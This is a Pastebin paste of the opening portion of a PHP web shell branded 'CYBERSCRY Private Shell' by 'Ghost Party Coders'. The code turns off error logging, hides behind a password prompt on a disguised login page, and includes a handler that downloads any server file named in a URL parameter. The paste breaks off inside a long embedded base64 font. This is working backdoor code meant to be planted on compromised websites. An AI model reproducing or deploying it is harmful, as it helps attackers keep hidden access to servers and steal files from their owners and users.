SHARE
TWEET

private shell cyberscry

a guest Oct 23rd, 2017 131 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "707d14912bb250caf67dfe0ea4035681fbfc4f56";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18.  
  19. function mlebu_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <title>Welcome :)</title>
  24. <style type="text/css">
  25. html {
  26.     margin: 20px auto;
  27.     background:black;
  28.     color: green;
  29.     text-align: center;
  30. }
  31. pre {
  32.     color: white;
  33. }
  34. header {
  35.     color: green;
  36.     margin: 10px auto;
  37. }
  38. input[type=password] {
  39.     width: 200px;
  40.     height: 25px;
  41.     color: red;
  42.     background: black;
  43.     border: 1px;
  44.     padding: 5px;
  45.     margin-left: 20px;
  46.     text-align: center;
  47. }
  48.  
  49. .kedip {
  50. -webkit-animation-name: blinker;
  51. -webkit-animation-duration: 3s;
  52. -webkit-animation-timing-function: linear;
  53. -webkit-animation-iteration-count: infinite;
  54.  
  55. -moz-animation-name: blinker;
  56. -moz-animation-duration: 2s;
  57. -moz-animation-timing-function: linear;
  58. -moz-animation-iteration-count: infinite;
  59.  
  60.  animation-name: blinker;
  61.  animation-duration: 1s;
  62.  animation-timing-function: linear;
  63.  animation-iteration-count: infinite;
  64.  
  65.  color: white;
  66. }
  67.  
  68. @-moz-keyframes blinker {  
  69.  0% { opacity: 1.0; }
  70.  50% { opacity: 0.0; }
  71.  100% { opacity: 1.0; }
  72.  }
  73.  
  74. @-webkit-keyframes blinker {  
  75.  0% { opacity: 1.0; }
  76.  50% { opacity: 0.0; }
  77.  100% { opacity: 1.0; }
  78.  }
  79.  
  80. @keyframes blinker {  
  81.  0% { opacity: 1.0; }
  82.  50% { opacity: 0.0; }
  83.  100% { opacity: 1.0; }
  84.  }
  85. </style>
  86. </head>
  87. <center>
  88. <header>
  89. <img src='https://s-media-cache-ak0.pinimg.com/236x/d0/59/cd/d059cd7b9f6c150dd8227630d7a6f15e.jpg'>
  90. <br>
  91.  
  92. <form method="post">
  93. <input type="password" name="pass">
  94. </form>
  95. <?php
  96. exit;
  97. }
  98. if(!isset($_SESSION[sha1($_SERVER['HTTP_HOST'])]))
  99.     if( empty($auth_pass) || ( isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass) ) )
  100.         $_SESSION[sha1($_SERVER['HTTP_HOST'])] = true;
  101.     else
  102.         mlebu_shell();
  103. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  104.     @ob_clean();
  105.     $file = $_GET['file'];
  106.     header('Content-Description: File Transfer');
  107.     header('Content-Type: application/octet-stream');
  108.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  109.     header('Expires: 0');
  110.     header('Cache-Control: must-revalidate');
  111.     header('Pragma: public');
  112.     header('Content-Length: ' . filesize($file));
  113.     readfile($file);
  114.     exit;
  115. }
  116. ?>
  117. <html>
  118. <head>
  119. <center>
  120. <link rel="SHORTCUT ICON" href="https://scontent-sit4-1.xx.fbcdn.net/v/t34.0-12/17821053_272489359875739_1796192318_n.jpg?oh=f97c2795550c4f3fec937245a89c6579&oe=58E70169" type="image/gif">
  121. <title>CYBERSCRY Private Shell</title>
  122. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  123. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  124. <meta name="keywords" content="Ghost PartyCoders, hack, deface, exploit, bug, security"/>
  125. <meta name="description" content="Ghost Party Coders">
  126. <meta name="author" content="Ghost Party Coder's">
  127. <meta name="googlebot" content="all,index,follow">
  128. <meta name="robots" content="index, follow">
  129. <center><style type='text/css'>
  130. @font-face {
  131.     font-family: 'ubuntu_monoregular';
  132.     src: url(data:application/x-font-woff;charset=utf-8;base64,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